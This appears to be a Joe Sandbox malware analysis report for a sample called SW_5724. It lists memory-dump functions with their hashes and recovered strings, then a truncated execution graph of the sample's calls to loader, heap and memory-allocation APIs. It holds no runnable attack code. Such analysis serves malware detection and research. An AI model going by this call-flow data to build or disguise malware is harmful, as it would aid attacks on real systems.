                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e6271fc8c847561f46acce4ccba1483310fc0ef4456fc572402ff5308b8fb93
                                                                                  • Instruction ID: 40d1c524cbe4f2ae4a04a734583c3856f747a263ddf2739176bc48eb98aa778b
                                                                                  • Opcode Fuzzy Hash: 8e6271fc8c847561f46acce4ccba1483310fc0ef4456fc572402ff5308b8fb93
                                                                                  • Instruction Fuzzy Hash: D290027170184442D14172984814B0F410597E1203FD6C019A4156654CCA1989555721
                                                                                  Function 01A939B0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5eb6b6f858c490caed47dfb7926a5249d98d48761156d455ae6fad1b16157a81
                                                                                  • Instruction ID: 8a36dd499df8355779b81714de89707585012a5a7c5255dd7b75e6da7971be21
                                                                                  • Opcode Fuzzy Hash: 5eb6b6f858c490caed47dfb7926a5249d98d48761156d455ae6fad1b16157a81
                                                                                  • Instruction Fuzzy Hash: CA90027174545102D151719C44146164005B7E0202F96C021A0814694DC65989556321
                                                                                  Function 01A93D10 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38aefb358adb6f2de8328b081de811aba510e8513eb5d64fea8617b60c54d5fa
                                                                                  • Instruction ID: f480ada69bbe66b467cdb941ff7a13d46625f0aac8e2c35c723d08b724c9c747
                                                                                  • Opcode Fuzzy Hash: 38aefb358adb6f2de8328b081de811aba510e8513eb5d64fea8617b60c54d5fa
                                                                                  • Instruction Fuzzy Hash: 8190027170240142954172985814A4E410597E1303FD6D415A0015654CCA1889615321
                                                                                  Function 01A93D70 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6127304ac608f5cdb77603f1d1273c5202c0a0ff56a73bed5d91d259bbf32a0b
                                                                                  • Instruction ID: 86d29c8111499d6683ccf7a1482c1407141cc780b34866d4242e83de064ccc0e
                                                                                  • Opcode Fuzzy Hash: 6127304ac608f5cdb77603f1d1273c5202c0a0ff56a73bed5d91d259bbf32a0b
                                                                                  • Instruction Fuzzy Hash: 2190027570140402D51171985814646004697D0302F96D411A0424658DC75889A1A221
                                                                                  Function 01A92C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 6cef0d0809dcbe3df2e256676f230342b38135167a7293ef9e4f456f2f10582e
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 01A92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: c0d1a68f6e0dac23230338f8496f024c97c44c888d84f0b1b43aceece5487c51
                                                                                  • Instruction ID: de263c7a95e7541e244de20c159ce63ba4fa273229a105f55b134c4ce2c9769a
                                                                                  • Opcode Fuzzy Hash: c0d1a68f6e0dac23230338f8496f024c97c44c888d84f0b1b43aceece5487c51
                                                                                  • Instruction Fuzzy Hash: BC51C7B6A0011ABFDF11DBAC8990A7EFBF8BB58640754C16EE4A5D7641E334DE4087E0
                                                                                  Function 01B02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 0535028c63c163e2acbeb094254a41e16e4dadeba36c1524c04cf08fadf14b92
                                                                                  • Instruction ID: baaf590385432d3252c1f3f23203baa7ad7e714ae5dd58366a82b5db0c1658dd
                                                                                  • Opcode Fuzzy Hash: 0535028c63c163e2acbeb094254a41e16e4dadeba36c1524c04cf08fadf14b92
                                                                                  • Instruction Fuzzy Hash: DC51F371A00646AFDF2ADEACC99487EBFF8EF44200B4484DAE5D6D3681E775DA048760
                                                                                  Function 01A87630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AC4742
                                                                                  • Execute=1, xrefs: 01AC4713
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AC4655
                                                                                  • ExecuteOptions, xrefs: 01AC46A0
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AC46FC
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AC4725
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AC4787
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: fc1911262a4083bff34dede17f353bc92e4891898e32afe308d8fc59e43521b1
                                                                                  • Instruction ID: a3e31bec5fd30456b69a8c222c905903f670334503e567fd1ffb65487e0cc77a
                                                                                  • Opcode Fuzzy Hash: fc1911262a4083bff34dede17f353bc92e4891898e32afe308d8fc59e43521b1
                                                                                  • Instruction Fuzzy Hash: 2A5139316002097BEF11BBE9DD95FBE77B8FF58714F1800A9E605A7180D7709A45CB50
                                                                                  Function 01B26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: 368d66d6b56d2b7419ac8e0de17120321d86f7797ef9e0bae7d62c88458ffd1c
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 13024771508352AFD709DF18C590A6FBBE5EFD8700F048A6DF9898B264DB31E949CB42
                                                                                  Function 01A9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: fa5fa7f1e71f4aeb26d9dc312ba0c0e22e127059d8fe7c4e7f801864ea772cb8
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: BB818070E062499EEF258F6CE891FFEBBF1AF45310F1C8659D951AB291C63498C087B1
                                                                                  Function 01B020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: d2194b027fc476a0044eac8d36459a1385e409dad7cccc78840b68e66530112b
                                                                                  • Instruction ID: 94b1505ca0a72bc30bbf36742ae9242e31e408df690522c241895fc8a33a7ef9
                                                                                  • Opcode Fuzzy Hash: d2194b027fc476a0044eac8d36459a1385e409dad7cccc78840b68e66530112b
                                                                                  • Instruction Fuzzy Hash: 2121A47AE00119ABDB15DF7ACD44AFEBFF8EF54650F44019AEA05E3240EB30D9058BA0
                                                                                  Function 01A7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC031E
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AC02BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AC02E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 65b4b59940d5437d1b33ca1d6a40bc5848d424ee7cb55f08f811e6adc921ad77
                                                                                  • Instruction ID: 04291cb2ec6e6edfe0599ebbf1db34706b9cbdd10fb877b79215837171547517
                                                                                  • Opcode Fuzzy Hash: 65b4b59940d5437d1b33ca1d6a40bc5848d424ee7cb55f08f811e6adc921ad77
                                                                                  • Instruction Fuzzy Hash: 54E1AC34604742DFDB25CF28C984B2ABBE1BF84724F144A2DF5A58B2E1D774DA45CB42
                                                                                  Function 01A8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC7BAC
                                                                                  • RTL: Resource at %p, xrefs: 01AC7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AC7B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: a2003f53b7d059ae05514d9960e0b79452dc13343091ba8b9e66ec966605d69d
                                                                                  • Instruction ID: 7d8095edf034a07a8ca21764d8ab1922320c0880d845e098455142f73a93a663
                                                                                  • Opcode Fuzzy Hash: a2003f53b7d059ae05514d9960e0b79452dc13343091ba8b9e66ec966605d69d
                                                                                  • Instruction Fuzzy Hash: 9741D0357007029FDB25EF29C940B6BB7E5EF98720F140A1DF95A9B680DB71E8058FA1
                                                                                  Function 01A8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AC728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01AC72C1
                                                                                  • RTL: Resource at %p, xrefs: 01AC72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AC7294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 55e1ea4be7dd1df71ec35515e03ecc64a7e29b144bebdf672f13f7c5aba0af48
                                                                                  • Instruction ID: e9e72b227cdbca847c2022435662e3a394ebedc579c4d1b6f4b174e6a7f74995
                                                                                  • Opcode Fuzzy Hash: 55e1ea4be7dd1df71ec35515e03ecc64a7e29b144bebdf672f13f7c5aba0af48
                                                                                  • Instruction Fuzzy Hash: 8D410231700602ABDB20EF69CC41B66B7A6FF94B10F14061DF956AB241DB30E8428BE1
                                                                                  Function 01B02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 7c92c31003c10b0cafefc491aec09bc8f28213a73e9a625a3d8da8255301c9d1
                                                                                  • Instruction ID: 07a94b3650b529137ed7efc2df8d7912329395522cc12b245d38ce80d28116e9
                                                                                  • Opcode Fuzzy Hash: 7c92c31003c10b0cafefc491aec09bc8f28213a73e9a625a3d8da8255301c9d1
                                                                                  • Instruction Fuzzy Hash: 343168766001199FDB25DF2DCD84BEEBBF8FF54610F4445D5E949D3140EB309A498B60
                                                                                  Function 01A97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 80e93228ef76764a66a150cd4162679c617fb0515c254d19adbfae79247bd8d1
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 15919271E1021A9AEF24DFADC881ABEBBF5AF44720F54451AE955A72C0E73489C0CF71
                                                                                  Function 01A59126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 051f1752bf5e2f0e4c537ef74097a3be4926a7f6a219c8d3296de4c7a3af1d87
                                                                                  • Instruction ID: b1cf52fafcaa557939dc039978f2478ea8c75fac40bbdb0a243d6a3936a20aff
                                                                                  • Opcode Fuzzy Hash: 051f1752bf5e2f0e4c537ef74097a3be4926a7f6a219c8d3296de4c7a3af1d87
                                                                                  • Instruction Fuzzy Hash: 4E810AB5D002699BDB718B54CD44BEEBBB8BB48754F0441EAEA1DB7240E7305E84CFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.5%
                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                  Signature Coverage:1.5%
                                                                                  Total number of Nodes:455
                                                                                  Total number of Limit Nodes:75
                                                                                  execution_graph 100273 479dcf 100274 479e47 100273->100274 100275 479dd7 100273->100275 100276 479de6 100275->100276 100278 48b7e0 100275->100278 100281 489a60 100278->100281 100280 48b7f9 100280->100276 100282 489a7a 100281->100282 100283 489a8b RtlFreeHeap 100282->100283 100283->100280 100289 2db2ad0 LdrInitializeThunk 100290 472908 100291 47291c 100290->100291 100294 476460 100291->100294 100293 472933 100295 476493 100294->100295 100296 4764b7 100295->100296 100301 489220 100295->100301 100296->100293 100298 4764da 100298->100296 100305 4896d0 100298->100305 100300 47655a 100300->100293 100302 48923d 100301->100302 100308 2db2ca0 LdrInitializeThunk 100302->100308 100303 489269 100303->100298 100306 4896ea 100305->100306 100307 4896fb NtClose 100306->100307 100307->100300 100308->100303 100309 4789d7 100311 4789da 100309->100311 100310 478991 100311->100310 100313 477250 100311->100313 100314 477266 100313->100314 100316 47729f 100313->100316 100314->100316 100317 4770c0 LdrLoadDll LdrLoadDll 100314->100317 100316->100310 100317->100316 100318 473293 100323 477f30 100318->100323 100321 4732bf 100322 4896d0 NtClose 100322->100321 100324 477f4a 100323->100324 100328 4732a3 100323->100328 100329 488d90 100324->100329 100327 4896d0 NtClose 100327->100328 100328->100321 100328->100322 100330 488daa 100329->100330 100333 2db35c0 LdrInitializeThunk 100330->100333 100331 47801a 100331->100327 100333->100331 100334 475dd3 100335 475d5f 100334->100335 100336 475ddf 100334->100336 100337 475d80 100335->100337 100341 4782b0 100335->100341 100340 475dac 100337->100340 100345 478230 100337->100345 100342 4782c3 100341->100342 100352 488bf0 100342->100352 100344 4782ee 100344->100337 100346 478274 100345->100346 100347 478295 100346->100347 100358 4889c0 100346->100358 100347->100337 100349 478285 100350 4782a1 100349->100350 100351 4896d0 NtClose 100349->100351 100350->100337 100351->100347 100353 488c71 100352->100353 100355 488c1e 100352->100355 100357 2db2dd0 LdrInitializeThunk 100353->100357 100354 488c96 100354->100344 100355->100344 100357->100354 100359 488a3d 100358->100359 100361 4889eb 100358->100361 100363 2db4650 LdrInitializeThunk 100359->100363 100360 488a62 100360->100349 100361->100349 100363->100360 100364 469f10 100365 46a1ca 100364->100365 100367 46a5bf 100365->100367 100368 48b440 100365->100368 100369 48b466 100368->100369 100374 4640f0 100369->100374 100371 48b472 100372 48b4ab 100371->100372 100377 4857f0 100371->100377 100372->100367 100381 4733a0 100374->100381 100376 4640fd 100376->100371 100378 485852 100377->100378 100380 48585f 100378->100380 100399 471b70 100378->100399 100380->100372 100382 4733bd 100381->100382 100384 4733d6 100382->100384 100385 48a150 100382->100385 100384->100376 100387 48a16a 100385->100387 100386 48a199 100386->100384 100387->100386 100392 488cf0 100387->100392 100390 48b7e0 RtlFreeHeap 100391 48a212 100390->100391 100391->100384 100393 488d0a 100392->100393 100396 2db2c0a 100393->100396 100394 488d36 100394->100390 100397 2db2c1f LdrInitializeThunk 100396->100397 100398 2db2c11 100396->100398 100397->100394 100398->100394 100400 471bab 100399->100400 100415 478040 100400->100415 100402 471bb3 100413 471e83 100402->100413 100426 48b8c0 100402->100426 100404 471bc9 100405 48b8c0 RtlAllocateHeap 100404->100405 100406 471bda 100405->100406 100407 48b8c0 RtlAllocateHeap 100406->100407 100408 471beb 100407->100408 100414 471c7f 100408->100414 100440 476bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100408->100440 100411 471e32 100436 488130 100411->100436 100413->100380 100429 4746e0 100414->100429 100416 47806c 100415->100416 100417 477f30 2 API calls 100416->100417 100418 47808f 100417->100418 100419 4780b1 100418->100419 100420 478099 100418->100420 100422 4780cd 100419->100422 100424 4896d0 NtClose 100419->100424 100421 4780a4 100420->100421 100423 4896d0 NtClose 100420->100423 100421->100402 100422->100402 100423->100421 100425 4780c3 100424->100425 100425->100402 100441 489a10 100426->100441 100428 48b8db 100428->100404 100431 4746fc 100429->100431 100430 47470b 100430->100411 100431->100430 100432 47472a 100431->100432 100444 48cc60 LdrLoadDll 100431->100444 100434 474757 100432->100434 100435 474740 LdrLoadDll 100432->100435 100434->100411 100435->100434 100437 488192 100436->100437 100439 48819f 100437->100439 100445 471ea0 100437->100445 100439->100413 100440->100414 100442 489a2d 100441->100442 100443 489a3e RtlAllocateHeap 100442->100443 100443->100428 100444->100432 100448 471ec0 100445->100448 100461 478310 100445->100461 100447 472419 100447->100439 100448->100447 100465 481330 100448->100465 100451 4720d7 100473 48c9b0 100451->100473 100452 471f1e 100452->100447 100468 48c880 100452->100468 100454 4782b0 LdrInitializeThunk 100457 472136 100454->100457 100455 4720ec 100455->100457 100479 4709d0 100455->100479 100457->100447 100457->100454 100459 4709d0 LdrInitializeThunk 100457->100459 100458 4782b0 LdrInitializeThunk 100460 472287 100458->100460 100459->100457 100460->100457 100460->100458 100462 47831d 100461->100462 100463 478345 100462->100463 100464 47833e SetErrorMode 100462->100464 100463->100448 100464->100463 100482 48b750 100465->100482 100467 481351 100467->100452 100469 48c890 100468->100469 100470 48c896 100468->100470 100469->100451 100471 48b8c0 RtlAllocateHeap 100470->100471 100472 48c8bc 100471->100472 100472->100451 100474 48c920 100473->100474 100475 48b8c0 RtlAllocateHeap 100474->100475 100478 48c97d 100474->100478 100476 48c95a 100475->100476 100477 48b7e0 RtlFreeHeap 100476->100477 100477->100478 100478->100455 100480 4709f2 100479->100480 100489 489970 100479->100489 100480->100460 100485 489840 100482->100485 100484 48b781 100484->100467 100486 4898d8 100485->100486 100488 48986e 100485->100488 100487 4898ee NtAllocateVirtualMemory 100486->100487 100487->100484 100488->100484 100490 48998a 100489->100490 100493 2db2c70 LdrInitializeThunk 100490->100493 100491 4899b2 100491->100480 100493->100491 100494 4772d0 100495 4772ec 100494->100495 100503 47733f 100494->100503 100497 4896d0 NtClose 100495->100497 100495->100503 100496 477477 100498 477307 100497->100498 100504 4766f0 NtClose LdrInitializeThunk LdrInitializeThunk 100498->100504 100500 477451 100500->100496 100506 4768c0 NtClose LdrInitializeThunk LdrInitializeThunk 100500->100506 100503->100496 100505 4766f0 NtClose LdrInitializeThunk LdrInitializeThunk 100503->100505 100504->100503 100505->100500 100506->100496 100507 47af10 100512 47ac20 100507->100512 100509 47af1d 100526 47a890 100509->100526 100511 47af39 100513 47ac45 100512->100513 100537 478520 100513->100537 100516 47ad90 100516->100509 100518 47ada7 100518->100509 100519 47ad9e 100519->100518 100521 47ae95 100519->100521 100556 47a2e0 100519->100556 100523 47aefa 100521->100523 100565 47a650 100521->100565 100524 48b7e0 RtlFreeHeap 100523->100524 100525 47af01 100524->100525 100525->100509 100527 47a8a6 100526->100527 100530 47a8b1 100526->100530 100528 48b8c0 RtlAllocateHeap 100527->100528 100527->100530 100528->100530 100529 47a8d8 100529->100511 100530->100529 100531 478520 GetFileAttributesW 100530->100531 100532 47abf2 100530->100532 100535 47a2e0 RtlFreeHeap 100530->100535 100536 47a650 RtlFreeHeap 100530->100536 100531->100530 100533 47ac0b 100532->100533 100534 48b7e0 RtlFreeHeap 100532->100534 100533->100511 100534->100533 100535->100530 100536->100530 100538 478541 100537->100538 100539 478553 100538->100539 100540 478548 GetFileAttributesW 100538->100540 100539->100516 100541 483540 100539->100541 100540->100539 100542 48354e 100541->100542 100543 483555 100541->100543 100542->100519 100544 4746e0 2 API calls 100543->100544 100545 48358a 100544->100545 100546 483599 100545->100546 100569 483000 LdrLoadDll LdrLoadDll 100545->100569 100547 48b8c0 RtlAllocateHeap 100546->100547 100552 483744 100546->100552 100549 4835b2 100547->100549 100550 48373a 100549->100550 100549->100552 100553 4835ce 100549->100553 100551 48b7e0 RtlFreeHeap 100550->100551 100550->100552 100551->100552 100552->100519 100553->100552 100554 48b7e0 RtlFreeHeap 100553->100554 100555 48372e 100554->100555 100555->100519 100557 47a306 100556->100557 100570 47dd20 100557->100570 100559 47a378 100561 47a500 100559->100561 100562 47a396 100559->100562 100560 47a4e5 100560->100519 100561->100560 100563 47a1a0 RtlFreeHeap 100561->100563 100562->100560 100575 47a1a0 100562->100575 100563->100561 100566 47a676 100565->100566 100567 47dd20 RtlFreeHeap 100566->100567 100568 47a6fd 100567->100568 100568->100521 100569->100546 100571 47dd44 100570->100571 100572 47dd51 100571->100572 100573 48b7e0 RtlFreeHeap 100571->100573 100572->100559 100574 47dd94 100573->100574 100574->100559 100576 47a1bd 100575->100576 100579 47ddb0 100576->100579 100578 47a2c3 100578->100562 100580 47ddd4 100579->100580 100581 47de7e 100580->100581 100582 48b7e0 RtlFreeHeap 100580->100582 100581->100578 100582->100581 100588 486f50 100589 486fb4 100588->100589 100590 486fdf 100589->100590 100593 480c70 100589->100593 100592 486fc1 100594 480c89 100593->100594 100599 480a20 100593->100599 100594->100592 100595 480c5c 100595->100592 100596 476570 LdrInitializeThunk 100596->100599 100597 4896d0 NtClose 100597->100599 100598 489170 LdrInitializeThunk 100598->100599 100599->100595 100599->100596 100599->100597 100599->100598 100600 46b6a0 100601 46cd11 100600->100601 100602 48b750 NtAllocateVirtualMemory 100600->100602 100602->100601 100603 47fa20 100604 47fa84 100603->100604 100605 476460 2 API calls 100604->100605 100607 47fbb7 100605->100607 100606 47fbbe 100607->100606 100632 476570 100607->100632 100609 47fd63 100610 47fc3a 100610->100609 100611 47fd72 100610->100611 100636 47f800 100610->100636 100613 4896d0 NtClose 100611->100613 100614 47fd7c 100613->100614 100615 47fc76 100615->100611 100616 47fc81 100615->100616 100617 48b8c0 RtlAllocateHeap 100616->100617 100618 47fcaa 100617->100618 100619 47fcb3 100618->100619 100620 47fcc9 100618->100620 100621 4896d0 NtClose 100619->100621 100645 47f6f0 CoInitialize 100620->100645 100623 47fcbd 100621->100623 100624 47fcd7 100648 489170 100624->100648 100626 47fd52 100627 4896d0 NtClose 100626->100627 100628 47fd5c 100627->100628 100629 48b7e0 RtlFreeHeap 100628->100629 100629->100609 100630 47fcf5 100630->100626 100631 489170 LdrInitializeThunk 100630->100631 100631->100630 100633 476595 100632->100633 100652 489010 100633->100652 100637 47f81c 100636->100637 100638 4746e0 2 API 